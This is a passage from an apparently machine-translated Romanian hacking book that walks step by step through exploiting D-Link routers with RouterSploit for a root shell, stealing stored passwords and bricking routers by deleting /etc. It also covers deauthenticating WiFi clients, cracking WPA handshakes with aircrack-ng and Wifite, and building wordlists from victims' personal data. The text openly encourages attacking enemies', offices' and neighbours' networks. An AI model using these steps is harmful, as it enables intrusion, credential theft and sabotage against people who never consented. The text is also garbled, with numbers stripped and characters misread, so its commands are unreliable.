termine cu A sau E În caz contrar, modificarea poate să nu funcționeze pe unele plăci de rețea Notă Nu toate driverele adaptoarelor de rețea acceptă schimbarea adresei MAC Pe Linux, pentru a schimba adresa MAC, trebuie să rulați următoarele comenzi: sudo ifconfig wlanO jos sudo ifconfig wlanO hw ether new MAC address sudo ifconfig wlanO sus repornirea rețelei de serviciu sudo Prima comandă dezactivează primul adaptor wireless Al doilea - setează o nouă adresă MAC Al treilea - pornește, al patrulea - repornește rețeaua Hackerea unui router folosind o vulnerabilitate Una dintre cele mai ușoare modalități de a pirata un router WiFi este exploatarea unei vulnerabilități despre care instrumentul RouterSploit "știe" [ Această metodă este potrivită dacă sunteți deja într-o rețea WiFi și trebuie să piratați routerul nu pentru a obține acces la rețeaua WiFi, ci în alte scopuri, de exemplu, pentru a ocoli restricțiile impuse de router - dacă routerul interzice vizitarea anumitor site-uri sau închiderea la o anumită oră de acces la Internet A doua utilizare a RouterSploit este să spargeți routerul unui inamic Dacă îi cunoști adresa IP, atunci este o chestiune de tehnică Puteți să-l piratați și să privați Internetul Este interesant să piratați un router care oferă acces la site în weekend - atunci site-ul va sta întins tot weekendul Unele firme de gamă medie pun un server web în birou pentru a economisi bani, iar pentru a economisi bani accesul la Internet se realizează cam de același router ca și acasă! Hackingul acestui miracol al tehnologiei este relativ ușor, așa cum va fi arătat în această secțiune După ce ați spart routerul, puteți pur și simplu să reconfigurați Internetul astfel încât să nu mai funcționeze (dacă accesul se face printr-o conexiune DSL, pur și simplu schimbați login-ul și parola pentru a vă conecta la furnizor și conexiunea nu va funcționa) sau faceți ceva mai rău, de exemplu, eliminați redirecționarea portului către server Apoi, administratorul va trebui să sape mai adânc - Internetul va fi în întregul birou, dar site-ul nu se va deschide Suntem dispuși să pariem că el va urca mai întâi pentru a "alege" serverul și apoi își va da seama că problema este în router Se va gândi la router în ultimul moment - la urma urmei, toată lumea are internet și nimeni nu se plânge! Exploitările RouterSploit vă permit să: • obțineți parola în text simplu • obțineți parola ca hash MD • executați comenzi pe un router de la distanță • explorați directoarele routerelor și descărcați fișiere • autentificare fără parolă • schimbaţi parola Toate vulnerabilitățile permit într-o oarecare măsură modificarea setărilor echipamentelor de rețea pentru a implementa atacurile ulterioare Instalarea și rularea instrumentului Pentru a pirata, avem nevoie de o distribuție asemănătoare Debian, aceeași Kali Linux pe care sperăm că l-ați instalat când citiți Capitolul Pentru a instala RouterSploit, introduceți următoarele comenzi: sudo pip install future sudo apt install git figlet sudo git clone https://github com/threat /routersploit Prima comandă va instala viitoarea componentă Python, a doua va instala pachetele git și figlet Dacă ai deja instalat git, nu trebuie să-l instalezi Al treilea clonează depozitul routersploit de pe computerul local Apoi, accesați folderul Routersploit și instalați dependențele: python -m pip install -r requirements txt Rămâne să rulăm scriptul: python rsf py Acest script conține multe exploit-uri pentru diferite modele de routere: D-Link, TP-Link, Huawei, Cisco etc O listă cu toate exploit-urile conținute poate fi vizualizată lansând comanda: arata tot Verificarea vulnerabilității pentru toate exploatările Pentru a verifica dacă este posibil să piratați routerul folosind oricare dintre exploit-urile disponibile, scriem: utilizați scanere/autown setați ținta , de exemplu, setați ținta setați portul alerga Notă A treia comandă trebuie introdusă dacă portul routerului este diferit de Portul implicit este , deci nu trebuie să îl introduceți Dar dacă v-ați dat seama folosind nmap că routerul folosește un alt port, atunci trebuie să schimbați numărul portului folosind comanda set port În continuare, va apărea o listă care va arăta dacă routerul este afectat de vreo vulnerabilitate: f-] exploits/zte/f xx default root nu este vulnerabil Pbg [-] exploits/juniper/screenos backdoor nu este vulnerabil [*] Timp scurs: secunde [+] Dispozitivul este vulnerabil! - exploits/dlink/dir rce - exploits/dlink/dir rce Ultimele rânduri indică faptul că routerul este supus unor vulnerabilități Poți folosi două exploituri împotriva lui deodată Verificarea unei vulnerabilități specifice Primul pas este să mergeți la pagina de autentificare a routerului, unde în % din cazuri va fi numele producătorului, iar în % - numele modelului Când cunoaștem furnizorul și modelul routerului (să fie D-Link DIR- ), trebuie să găsim ceva consonan printre exploit-uri Să verificăm dacă routerul testat este vulnerabil la acest exploit particular Selectați-l pentru a utiliza: utilizați exploits/dlink/dir rce Vezi informații despre acesta: arata informatii Nume: D-LINK DIR- & DIR- RCE Descriere: Modulul exploatează vulnerabilitatea D-Link DIR- , DIR- Remote Code Execution care permite executarea comenzii la nivel de sistem de operare cu privilegii root Dispozitive: - D-Link DIR - D-Link DIR Autori: - Michael Messner # descoperire a vulnerabilităților - Marcin Bury # module routersploit eu ] Referinte: - http://www dlink com/uk/en/home-solutions/connect/routers/dir- -wireless-n- -home-router - http://www s curlty de/home-network-horror-days - http://www s curlty de/mladv - Totul se potrivește - dispozitivul nostru se află pe lista celor vulnerabili Setați ținta (și portul dacă este necesar - nu uitați portul!): stabilit ținta Dacă nu doriți să ucideți routerul, ci doar să verificați dacă îl puteți pirata cu exploit-ul selectat, introduceți comanda: Verifica Ieșirea va fi astfel: > verifica [+] Ținta este vulnerabilă Utilizarea exploit-urilor După ce ați găsit o vulnerabilitate care afectează routerul, selectați modulul corespunzător: utilizați exploits/dlink/dir rce Setează un scop: stabilit ținta Rulați exploitul: alerga rsf(D-Link DIR- & DIR- RCE) > rulați [*] Modul de rulare [+] Ținta este vulnerabilă [*] Se invocă bucla de comandă cmd > Acordați atenție liniei de comandă modificată Înseamnă că poți trimite comanda direct către router Comenzile routerului sunt comenzile aceluiași Linux, deoarece toate routerele rulează acest sistem de operare, doar o versiune ușor trunchiată Deci puteți introduce comenzi cd / Оs - Aceste comenzi vor afișa conținutul sistemului de fișiere al routerului În continuare, trebuie să găsiți parolele În multe modele, parolele de acces sunt stocate necriptate De exemplu, pe aceleași DIR- și DIR- , parolele sunt stocate în fișierele /var/passwd și /var/etc/hnapasswd Să ne uităm la aceste fișiere: cat /var/passwd "admin" " !* " " cat /var/etc/hnapasswd admin: ! Acum puteți merge la pagina routerului ipr:// Unele routere sunt atât de stupide încât permit accesul la această pagină din exterior Majoritatea routerelor moderne nu permit acest lucru Ce se poate face în acest caz? Puteți, de exemplu, să schimbați parolele și să reporniți routerul: echo "hacker: " > /var/etc/hnapasswd repornire Puteți șterge fișierele de configurare (directorul /etc) și, de asemenea, reporniți routerul - putem spune cu încredere că nu va porni din nou În general, există multe opțiuni - ceea ce este suficient pentru cunoștințele și imaginația ta Ca material suplimentar pentru reflecție, vă împărtășim un link minunat care descrie comparația dintre Router Sploit și Router Scan, există și câteva informații despre hacking-ul routerelor DLink DIR: https://hackware ru/?p= Hackerea unui router WPAl Mituri și realitate În această secțiune, unul dintre autorii acestei cărți va încerca să pirateze routerul său de acasă Schema va fi așa Kaii Linux va fi instalat în mașina virtuală VMWare Un adaptor USB va fi conectat la mașina virtuală (din fericire, redirecționarea portului USB în VMWare funcționează corect, spre deosebire de același Nureg-V), prin care se vor face încercări de conectare la rețeaua WiFi de acasă Dar mai întâi, o mică digresiune Când au apărut pentru prima dată rețelele WiFi, a fost folosită tehnologia Wired Equivalent Proxy (WEP), care trebuia să asigure confidențialitatea rețelelor WiFi Dar această tehnologie s-a dovedit a fi ineficientă, este ușor de spart Pentru a înlocui WEP, a fost dezvoltat un nou algoritm de confidențialitate - WPA (Wi-Fi Protected Access) WPA nu este o tehnologie nouă, este un întreg set de tehnologii - IX + EAP + TKIR + MIC (dacă nu știi ce este - Google) Toate acestea au făcut hackingul mai dificil, dar nu au făcut-o imposibil Începând din , protocolul WPA a început să se răspândească El a folosit AES ca algoritm de criptare, care este foarte greu de spart Dezavantajul WPA este că parola criptată este transmisă atunci când utilizatorii se conectează în timpul așa-numitului -way handshake ( -way handshake) Dacă prindem o strângere de mână, vom ști parola criptată și nu va trebui decât să o decriptăm Vom folosi aircrack-ng în acest scop Dar de la cuvinte la fapte Să vedem cum arată hacking-ul în practică Primul pas este să determinați numele interfeței noastre wireless în Linux Pentru a face acest lucru, introduceți comanda: dacă config Aceasta și toate comenzile ulterioare trebuie introduse ca root Așadar, conectați-vă ca root dacă nu ați făcut-o deja sau tastați sudo bash pentru a obține un shell rădăcină Ca rezultat al executării ifconfig, veți vedea o listă de interfețe de rețea pe sistemul dumneavoastră (Fig ) De regulă, adaptoarele wireless din Kaii Linux se numesc wlanN, unde N este numărul adaptorului, numerotarea începe de la Dacă aveți un adaptor, atunci numele acestuia va fi wlanO Presupunerea noastră a fost confirmată, iar interfața se numește într-adevăr wlanO Acum trebuie să punem adaptorul în modul de monitorizare În acest mod, adaptorul WiFi va vedea tot traficul care trece pe lângă noi Notă O singura data în - a existat un program GiveMeToo foarte popular A fost folosit nu numai de hackeri, ci și de serviciul de securitate al întreprinderilor mari Esența cheii este fată în următorul Toate rețelele din acea vreme erau construite pe baza tehnologiei Ethernet (puțini oameni știau atunci despre WiFi și, dacă știau, era puțin folosit în spațiile noastre deschise) Hub-urile (HUB) au fost folosite ca dispozitive principale de rețea, sau tehnologia comună a magistralei a fost folosită în general, când toate computerele erau conectate ca o ghirlandă Adevărat, această tehnologie nu a fost folosită la întreprinderile mari, s-au folosit în principal hub-uri, deoarece deteriorarea magistralei comune a garantat timp de nefuncționare pentru întreaga rețea Hub-ul, cunoscut și sub numele de hub, folosea, de fapt, aceeași tehnologie comună de autobuz Când unul dintre computere a trimis un pachet de date, hub-ul l-a primit și l-a transmis în toate porturile sale Adică, pachetul de date pe care l-ați trimis a fost primit de toate computerele din rețea Apoi computerul a analizat pachetul Dacă acest computer a fost specificat ca destinatar, l-a acceptat, dar dacă altul, pachetul a fost abandonat (DROP) Programul GiveMeToo a pus adaptorul de rețea în așa-numitul mod promiscuu (mod promisiune), în care a acceptat toate pachetele - atât cele care îi erau adresate, cât și cele care erau adresate altor computere Și atunci a început cel mai interesant Având în vedere că traficul nu era criptat în acel moment (nu a fost folosită nicio criptare, protocolul HTTP era exact HTTP, nu HTTPS etc ), hackerul putea citi cu ușurință toată corespondența (mail, ICQ, IRC), să vadă cine vizitează ce site-uri , etc Și apoi a fost foarte ușor să fii hacker Nu a fost nevoie de cunoștințe speciale - doar rulați programul GiveMeToo pe orice (!) computer conectat la rețea și urmăriți pe toată lumea Ultima actualizare a acestui minunat program a fost în În plus, rețelele au trecut pur și simplu la utilizarea comutatoarelor Comutatorul redirecționează pachetul de ieșire nu către toate porturile, ci numai către un anumit port Când un computer este conectat la portul comutatorului, acesta își introduce adresa într-un tabel intern Când vede un pachet de intrare, parsează adresa de destinație și trimite pachetul numai către portul la care este conectată destinația Al doilea motiv pentru care utilizarea GiveMeToo nu este posibilă este utilizarea pe scară largă a criptării Toate datele transmise prin rețea sunt criptate și, chiar dacă le interceptați, trebuie să încercați să le decriptați În ceea ce privește WiFi, aici toate datele transmise (din toate rețelele (!!!)) sunt transmise pe un mediu comun - prin aer De aceea putem trece adaptorul în modul monitor, ceea ce ne va permite să captăm tot traficul transmis în jurul tău SHІІІіііііііііііііnіііііііііtіііііііііііші! Pic Lista adaptoarelor de rețea Pentru a face acest lucru, introduceți comanda: airmon-ng start wlanO Mai exact, în cazul meu, programul a raportat că nu s-a putut traduce adaptorul este în modul de monitorizare deoarece este utilizat de două procese - NetworkManager și wpa supplicant Pentru a opri aceste procese, trebuie să introduceți comanda airmon-ng check kill Orez Nu se poate pune adaptorul în modul de monitorizare Introdu această comandă și vezi ce se întâmplă: airmon-ng check kill Programul va raporta că a "ucis" anumite procese: Omorârea acestor procese: Nume PID wpa supplicant Nu este clar unde a mers NetworkManager, dar vom încerca să punem din nou interfața în modul de monitorizare: airmon-ng start wlanO Orez Omorâm procesele care blochează interfața După cum veți vedea, programul airmon-ng va raporta că interfața wlanO nu a fost găsită Ca urmare a acțiunilor întreprinse, interfața noastră a fost redenumită în wlanOmon, care va fi raportată de ieșirea comenzii ifconfig ( ) Orez Interfața wlanO a fost redenumită în wlanO Prin urmare, introducem comanda: airmon-ng start wlanOmon După cum se vede în fig , adaptorul a fost trecut cu succes în modul de monitorizare Orez Adaptorul este pus în modul de monitorizare Acum că adaptorul nostru de rețea este în modul monitor, putem captura traficul care trece pe lângă noi folosind comanda airodump-ng Introducem comanda: airodump-ng wlanOmon Ieșirea va fi apoi așa cum se arată în Fig Să ne dăm seama ce și de ce O listă de rețele wireless este afișată în partea de sus În partea de jos este o listă de clienți Atenție, acum există doi clienți - unul este conectat la rețeaua de interes pentru noi cu BSS D D : D: :A :F :F Am șters ESSID-ul acestei rețele intenționat, astfel încât să fie imposibil să calculăm autorul acestei cărți din el - anonimatul este mai presus de toate Al doilea client este conectat la rețea B : E: :A : : - rețeaua se numește TP-Link Următorul nostru pas este să ne concentrăm eforturile pe unul dintre punctele de acces și canalul acestuia Suntem interesați de BSSID-ul și numărul de canal al punctului de acces (afișat în coloana CH), pe care îl vom pirata Deschideți un nou terminal și introduceți comanda airodump-ng bssid D : D: :A :F :F -c -w WPAcrack wlanOmon Pic A început modul de monitorizare Aici: • D : D: :A :F :F - BSSID punct de acces • -с - canalul pe care operează punctul de acces Wi-Fi • WPAcrack - fișierul în care va fi scris strângerea de mână • wlanOmon - adaptor de rețea în modul de monitorizare După cum puteți vedea în captura de ecran , în prezent ne concentrăm pe captarea datelor de la un singur AP cu BSSID D : D: :A :F :F per canal Lăsați terminalul deschis! Orez Captăm date numai de la un anumit HlFi-cemu Pentru a captura parola criptată, avem nevoie ca clientul să fie autentificat (conectat la Wi-Fi) Dacă este deja autentificat, îl putem dezautentifica (dezactiva), atunci sistemul se va reautentifica (conecta) automat, în urma căruia putem obține o parolă criptată Adică trebuie doar să deconectăm utilizatorii conectați, astfel încât să se conecteze din nou Pentru a face acest lucru, deschideți un alt terminal și introduceți: $ aireplay-ng deauth -a D : D: :A :F :F wlanOmon Aici: • - numărul de utilizatori de dezautentificat; • D : D: :A :F :F - BSSID punct de acces • wlanOmon - adaptor de rețea în modul de monitorizare Dacă, ca și noi, accesați propria rețea pentru un experiment, puteți deconecta un singur client (de exemplu, telefonul mobil) și îl puteți reconecta fără a ucide toți ceilalți clienți Acum, la reconectare, fereastra pe care am lăsat-o la pasul anterior va prinde strângerea de mână Să ne întoarcem la terminalul nostru airodump-ng și să aruncăm o privire În colțul din dreapta sus ar trebui să vedeți fraza: CH ][Scurs: minute][ - - : ][ canal fix wlanOmon: ][ strângere de mână WPA : D : D: :A :F :F Aceasta înseamnă că am capturat parola criptată Este deja ceva Avem parola, rămâne să o decriptăm Acum că avem parola criptată în fișierul nostru WPAcrack, putem începe să ghicim parola Dar pentru aceasta trebuie să avem o listă de parole pe care dorim să le folosim O astfel de listă o găsești în minute pe Google Folosim listele implicite de parole care vin cu Kaii Linux Toate aceste liste de cuvinte sunt stocate în directorul /usr/share/wordlists (Figura - ) Deschideți un nou terminal și introduceți comanda: $ aircrack-ng WPAcrack- cap -w Pic Lista de parole Aici este fișierul cap WPAcrack- unde am scris strângerea de mână (airodump-ng a adăugat - cap la sfârșit) Cât timp va dura să spargeți o parolă criptată? Parolele sunt sparte ca forța brută - adică programul încearcă pur și simplu să folosească o parolă dintr-o listă de cuvinte Dacă reușește să decripteze fișierul WPAcrack, atunci succes În caz contrar, încearcă următoarea parolă Deci succesul depinde de vocabularul tău Este clar că, dacă nu merge cu o singură listă, o poți încerca pe următoarea Mai devreme sau mai târziu, va apărea un cuvânt pe care utilizatorul l-a specificat ca parolă Acest proces poate dura mult timp Totul depinde de lungimea listei de parole, puteți aștepta de la câteva minute la câteva zile Pe un procesor Intel cu nuclee, aircrack-ng preia puțin peste de parole pe secundă Într-o mașină virtuală, această cifră poate fi mai mică Când parola este găsită, aceasta va apărea pe ecran Recomandări pentru utilizarea programului: Acest tip de atac este eficient pentru a ghici o parolă dintr-o listă, dar în practică inutil pentru selecția aleatorie Totul este despre timp Dacă Wi-Fi este protejat de o parolă medie de litere și cifre latine, atunci selecția aleatorie va dura câțiva ani Când alegeți o listă de parole, asigurați-vă că luați în considerare factorii geografici De exemplu, nu are sens să faci o selecție într-un restaurant din Berlin conform listei rusești de parole Găsiți o listă cu parolele utilizate frecvent J germană și ai răbdare În orice caz, puteți captura parola criptată și puteți continua decriptarea în altă parte (acasă, într-un hotel) Când parola este decriptată, vă puteți întoarce la acel punct de acces și vă puteți conecta la el Dacă ești enervat de un vecin sau concurent, folosește comanda aireplay-ng deauth -a wlanOmon pentru a-și opri rețeaua Dacă piratați Wi-Fi-ul de acasă, atunci încercați să aflați orice date personale ale victimei (nume, prenume, data nașterii, numele câinelui, numele copilului etc ) și generați o listă suplimentară de parole din aceasta date Parole ca aceasta sunt adesea folosite (cu siguranță ar trebui să adăugați aceste parole la listele dvs de parole și să le adăugați chiar la începutul listei, deoarece succesul cu aceste parole este foarte probabil): " Numele copilului și data nașterii, de exemplu, Dima " Număr de telefon (Wi-Fi la stabilirea apelurilor nu se deranjează și setează numărul de telefon al clientului ca parolă) " Secvențe de cifre , , , etc După ce ați prins strângerea de mână, dezactivați aireplay-ng (nu faceți să sufere utilizatorii obișnuiți) Desigur, dacă nu aveți punctul Automatizați hacking-ul cu WiFite Cititorii care au studiat la fizică și matematică își vor aminti acum cum decurge cursul În primul rând, vă sunt explicate metode diferite de rezolvare Și apoi spun că există o a unsprezecea metodă, care este cea mai simplă și care va ajuta în majoritatea cazurilor, cu excepția unor valori extreme O situație similară s-a dezvoltat cu hacking-ul WiFi Ultima secțiune v-a arătat cum să utilizați o suită întreagă de programe pentru a sparge o rețea WiFi În această secțiune, ne vom uita la instrumentul WiFite care ne permite să automatizăm întregul proces Folosește aceleași instrumente pe care le-am folosit în ultima secțiune, plus câteva suplimente Deci, primul lucru pe primul loc WiFite este un instrument automat de atac wireless și funcționează numai pe Linux, ceea ce înseamnă că nu există versiuni Windows sau macOS Wifite a fost creat pentru a fi utilizat cu distribuții de testare de penetrare, cum ar fi Kali Linux, Pentoo, BackBox; orice distributie Cizme Linux cu drivere wireless corecţionate pentru injecţie Se pare că funcționează și pe Ubuntu, Debian și Fedora Programul trebuie rulat doar ca root, ceea ce este necesar pentru programele pe care WiFite le folosește atunci când pirata WiFi Nu recomandăm să rulați nimic ca root, așa că cel mai bine este să instalați Kaii Linux într-o mașină virtuală, să conectați un adaptor USB WiFi (da, va trebui să cheltuiți bani pentru securitate) Nu este necesar să rulați acest instrument pe sistemul pe care îl utilizați pentru munca zilnică Dacă utilizați Windows în fiecare zi, atunci nu aveți prea multe de ales - instalați Kaii Linux și va avea deja WiFite Wifite presupune că aveți un adaptor wireless și drivere adecvate corectate pentru modul de injectare și promiscuu/supraveghere Acestea sunt disponibile în Kaii Linux, BackBox, Pentoo În alte distribuții, trebuie să vă ocupați singur de toate acestea Instrumentul poate ataca mai multe rețele criptate WEP, WPA și WPS la rând Acest instrument este personalizabil la automatism cu doar câteva argumente Scopul Wifite este să fie un instrument de audit fără fir "set-o și uită-l" Cu alte cuvinte, îl lansați, vedeți o listă de rețele wireless, selectați ținte și așteptați ca instrumentul să pirateze rețeaua dorită Puteți ataca chiar și toate punctele de acces din jur Caracteristicile instrumentului: • sortează ținte după semnal (în dB); pirata mai întâi cele mai apropiate puncte de acces • Deautentifică automat clienții de rețea ascunși pentru a-și dezvălui SSID-ul • un set de filtre pentru a specifica exact ce să atace (wep/wpa, peste o anumită putere a semnalului, canale etc ) • setări flexibile (timeout-uri, pachete pe secundă, altele) • Funcții "anonimitate": schimbarea MAC la o adresă aleatorie înainte de atac, apoi schimbarea inversă când atacul este finalizat • toate strângerile de mână WPA capturate sunt copiate în directorul actual wifite py • dezautentificare inteligentă WPA; cicluri între toate deautentificarea clientului și difuzare • opriți orice atac prin Ctrl+C cu opțiuni pentru a continua, a merge la următoarea țintă, a omite hack-ul sau a ieși • afișarea informațiilor generale despre sesiune la ieșire; arătând toate cheile sparte • toate parolele sunt salvate în cracked txt Dependențe necesare: • Python - Wifite este un script scris în Python și necesită Python pentru a rula și este compatibil atât cu versiunile python , cât și cu python • iwconfig - pentru a determina dacă interfețele wireless sunt deja în modul monitor • ifconfig - pentru a porni/opri dispozitivele wireless • Setul aircrack-ng - sunt utilizate în mod specific următoarele programe: " airmon-ng - pentru a enumera și activa modul de monitorizare pe interfețele wireless " aircrack-ng - pentru spargerea fișierelor WEP cap și strângerile de mână WPA capturate " aireplay-ng - pentru dezautentificarea punctelor de acces, reluarea fișierelor de captură, diverse atacuri " airodump-ng - pentru scanarea țintelor și generarea fișierelor de captură " packetforge-ng - pentru fișiere de captură false Dependențe opționale, dar recomandate: • Reaver - conceput pentru a selecta un pin WPS (Wifi Protected Setup) prin forță brută Reaver include un scaner "walsh" (sau "wash") pentru a detecta punctele de acces cu WPS activat Wifite folosește și scanarea Reaver pentru a ataca routerele cu WPS activat • Pyrit - cracker de chei WPA PSK folosind GPU Wifite folosește Pyrit (dacă este găsit) pentru a detecta strângerile de mână În viitor, Wifite poate avea opțiunea de a sparge strângerile de mână WPA cu Pyrit • tshark - vine la pachet cu Wireshark, un software de sniffing de pachete • coWPAtty - cracker de chei WPA PSK Wifite folosește cowpatty (dacă este prezent) pentru a detecta strângerile de mână • Pixiewps este un instrument scris în C, este folosit pentru a offline forța brută a unui pin WPS prin exploatarea entropiei scăzute sau inexistente a unor puncte de acces (atac pixie dust) Lansa: wifite wifite -pow -wps Când este lansat fără parametri, programul caută toate punctele de acces disponibile În al doilea caz, programul va ataca punctele de acces cu o putere mai mare de dB (-pow ) folosind atacul WPS (-wps) De regulă, dacă nivelul semnalului este sub dB, atunci punctul de acces este mai departe decât ați dori și, chiar dacă îl piratați, nu veți obține o conexiune bună la internet prin intermediul acestuia Să vedem programul în acțiune Rulați-l fără parametri Dacă unele utilitare lipsesc, programul va raporta acest lucru chiar de la început Formatul mesajului programului lipsă este următorul: [!] Avertisment: aplicația recomandată nu a fost găsită instalați Sunt date numele programului și comanda care trebuie introdusă pentru a-l instala Este foarte recomandat să instalați toate programele lipsă Orez Programul cauta HlFi~cemu Rețeaua piratată SS D, noi, ca întotdeauna, da, inchis Nu acordați atenție proceselor aflate în conflict dacă nu există probleme - dacă vedeți o listă de puncte de acces și programul funcționează bine Dacă nu există puncte de acces în listă și știți că acestea sunt, atunci rulați programul cu parametrul kill (wifite - kill) Apoi, programul va începe să afișeze o listă de puncte de acces găsite Când vedeți că victima dvs este pe listă, apăsați Ctrl + C Când apăsați Ctrl + C, programul vă va cere numărul punctului de acces care trebuie piratat Dacă trebuie să piratați mai multe puncte de acces, introduceți-le separate prin virgule (de exemplu ) Dacă trebuie să spargeți toate punctele de acces pe care le-a văzut programul, tastați toate și apăsați Enter Să vedem rezultatul programului (comentariile noastre sunt marcate cu un hash): # Începeți un atac împotriva punctului de acces selectat Pornirea atacurilor împotriva D :OD: :А :F :F (SSID) # Atacul WPS Pixie-Dust a eșuat - expirare [ + ] SSID ( db) WPS Pixie-Dust: [ - s] Eșuat: Timeout după de secunde # Atacul PIN WPS NULL a eșuat - expirare [+] SSID ( db) WPS NULL PIN: [ s] Eșuat: Timeout după de secunde # WPS PIN Attack, de asemenea, eșuat - prea multe timeout-uri [+] SSID ( db) WPS PIN Attack: [ m s PIN-uri:l] Eșuat: Prea multe timeout-uri ( ) # Omiteți atacurile PMKID, deoarece utilitățile necesare lipsesc [!] Se omite atacurile PMKID, lipsesc instrumentele necesare: hcxdumptool, hcxpcaptool # Atac de capturare WPA Handshake - capturare parolă - client nou detectat [+] Captură SSID ( db) WPA Handshake: S-a descoperit un nou client: # Parola capturată Ura! [+] SSID ( db) Captură de strângere de mână WPA: strângere de mână capturată # Salvați copia de strângere de mână în fișierul hs/handshake SSID BSSID cap din directorul /root [+] salvează o copie a strângerii de mână în hs/handshake SSID BSSID cap salvat # Analizarea parolei criptate [ + ] analiza fișierului de strângere de mână capturat: # tshark raportează că fișierul conține o strângere de mână validă [ + ] tshark: fișierul cap conține o strângere de mână validă pentru D : D: :A :F :F # dar aircrack (nu aircrack-ng) raportează că nu totul este bine, verificați mai târziu [!] aircrack: fișierul cap nu conține o strângere de mână validă # încercarea de a sparge parola folosind fișierul wordlist-probable txt - în el # lista implicită de parole [ + ] Cracking WPA Handshake: rularea aircrack-ng cu wordlist-probable txt liste de cuvinte [+] Strângere de mână WPA: % ETA: s @ , kbps (cheie actuală: ) # Fișierul wordlist-probable txt nu conține o parolă (!] Nu s-a putut sparge strângerea de mână: wordlist-probable txt nu conținea parola # Încheiați atacul, ieșiți [ + ] S-a terminat de atacat țintă(e), ieșire # Notă: lăsați interfața în modul de monitorizare [!] Notă: Se lasă interfața în Modul Monitor! # Când ați terminat, puteți dezactiva modul de monitorizare cu airmon-ng stop [!] Apoi dezactivați modul Monitor când ați terminat: airmon-ng stop wlanOmon Să analizăm ce avem: Programul a încercat să atace routerul folosind vulnerabilități cunoscute Nu s-a intamplat nimic Apoi programul a capturat parola și a salvat fișierul cu parola în director directorul principal hs Deoarece rulam programul ca root, fișierul cu parolă a fost salvat în directorul /root/hs După numele fișierului, veți înțelege din ce rețea a fost capturată parola Și dacă ați spart o rețea, atunci nu trebuie să vă gândiți - va exista un singur fișier Programul a încercat să spargă parola folosind lista de parole wordlist-probable txt Ea a eșuat deoarece parola nu a fost găsită în listă Apoi, programul a ieșit, lăsând adaptorul de rețea în monitorizarea În ciuda faptului că programul nu a putut sparge parola, a reușit să obțină strângere de mână WPA, adică parola criptată Singurul lucru rămas este să rulați programul aircrack-ng pentru a decripta această parolă: cd ~/hs aircrack-ng handshake SSID BSSID cap -w password txt Deci, mergem la directorul ~/hs și transferăm fișierul rezultat în utilitarul aircrack-ng În același director, am plasat fișierul password txt cu probabil parolele Deoarece ne știam parola, de dragul experimentului, am adăugat mai multe parole eronate și una corectă la acest fișier Programul a decriptat cu succes strângerea de mână WPA și a afișat parola pe ecran (Fig Aircrack-g [ С:о": "] / F F BB D CD E F Fi E E F E C C EA C C F R" M EAPOt NMDG EO FI E A GBP C M F • -Zhs Pic Parolă decriptată Se pot trage următoarele concluzii: • Instrumentul wifite simplifică foarte mult procesul de piratare a unei rețele WiFi Chiar și un utilizator Linux începător se poate descurca, pentru că la urma urmei, va trebui să vă familiarizați cu elementele de bază ale acestui sistem de operare, dar nu există Wi-Fi pentru alte sisteme • Succesul depinde în mare măsură de lista de parole utilizată Dacă ați studiat victima și i-ați ghicit parola, veți avea succes Cu o listă standard de parole, nu poți sparge prea multe Aplicație Android pentru forțarea brută a unei rețele WiFi Există aplicații Android pentru forțarea brută a rețelelor WiFi - pur și simplu se vor conecta la rețea încercând parole Una dintre aceste aplicații este Wlfi BRuteforce hack, care poate fi descărcată de la: https:// pda ru/forum/index php showtopic= Desigur, nu îl veți găsi în Play MarketTbi Nu ne plac astfel de programe Si de aceea: • Odată ce ai o strângere de mână WPA, o poți forța brută și nu un router În primul rând, există mai puține șanse de a fi observat (mai ales dacă vecinul are un router inteligent) În al doilea rând, mult mai repede La urma urmei, programul aircrack-ng face, în esență, forțarea brută, de asemenea, dar o va face cu o viteză de de parole pe secundă pe un procesor dual-core Încercați să atingeți această viteză atunci când vă conectați la WiFi! • Succesul depinde din nou doar de fișierul listei de parole • Dacă analizați cu atenție victima, puteți face - parole și puteți încerca să le ghiciți manual Crede-mă, va fi chiar mai rapid decât folosirea unor astfel de instrumente • Wifite este bun pentru că cu setările potrivite (când sunt instalate toate utilitățile necesare, când sunt compilate listele de parole necesare), poți să-l rulezi și să te culci Și dimineața veți găsi - parole de la rețelele vecine, ceea ce este deja foarte bun! Cum să obțineți un dicționar bun pentru hacker Un atac de dicționar accelerează semnificativ și, în general, crește șansele de a sparge cu succes o parolă prin forță brută Nu poate exista un singur dicționar cel mai bun - situații diferite necesită dicționare diferite Se pare că obținerea unui dicționar bun nu este mai dificilă decât cumpărarea de arme de pe Internet Glumă Mai devreme se spunea că dicționarele pot fi luate pe internet și probabil că ai avut deja timp să te gândești că ai fost lăsat să te descurci singur Dicționare BruteX Programul BruteX vine cu o selecție de dicționare pentru autentificarea de la distanță în forță brută la diferite servicii și aplicații web Puteți vedea dicționarele disponibile aici: https://github com/lN /BruteX/tree/master/wordlists Există dicționare (acestea nu sunt toate liste, ci doar unele selectate): • ftp-default-userpass txt - parole FTP implicite • mssql-default-userpass txt - parolele pentru utilizatorii MS SQL implicit • mysql-default-userpass txt - Parolele implicite ale utilizatorului MySQL • namelist txt - lista de nume (autentificare) • oracle-default-userpass txt - lista de parole implicite de utilizator Oracle • password Ist este doar o listă de parole • password medium txt - o listă de parole de complexitate medie • password weak txt - listă de parole slabe, încercați mai întâi! • postgres-default-userpass txt - lista de parole implicite de utilizator PostgreSQL • simple-users txt - nume de utilizator (simple) • windows-users txt - listă de utilizatori Windows În total, există de fișiere în setul de programe pe care le puteți utiliza într-o anumită situație Suficient pentru început, dar încă o dată acordăm atenție - trebuie să vă formați propriile liste Lasă pe baza celor existente! Dicţionar rockyou Dicționarul de la creatorii lui rockyou este un dicționar de uz general, potrivit, de exemplu, pentru a ataca o parolă Wi-Fi sau un serviciu web Pe Kaii Linux, această parolă se află în fișierul (comprimat) /usr/share/wordlists/rockyou txt gz (trebuie să-l despachetați înainte de a-l folosi) Pe orice alt sistem, poate fi instalat cu comanda: git clone git://git kali org/packages/wordlists git Dicționarul rockyou trebuie optimizat și curățat pentru nevoi specifice De exemplu, dacă știm că lungimea unei parole într-un serviciu web este de la la de caractere și că trebuie folosite caractere din cel puțin două grupuri (litere majuscule, litere mici, cifre, semne), atunci ștergerea rockyou folosind PW -Inspectorul va arăta așa: pw-inspector -i liste de cuvinte/rockyou txt -m -M -c - -u -n -p Optimizarea pentru hacking Wi-Fi ar arăta astfel Citim parolele din fișierul rockyou txt (cat rockyou txt) la ieșirea standard, le sortăm (sortăm) și eliminăm duplicatele (uniq), din parolele rămase le selectăm pe cele care au sau mai multe caractere, dar mai puțin de de caractere (-ch -M ), salvați lista rezultată în fișierul newrockyou txt (> 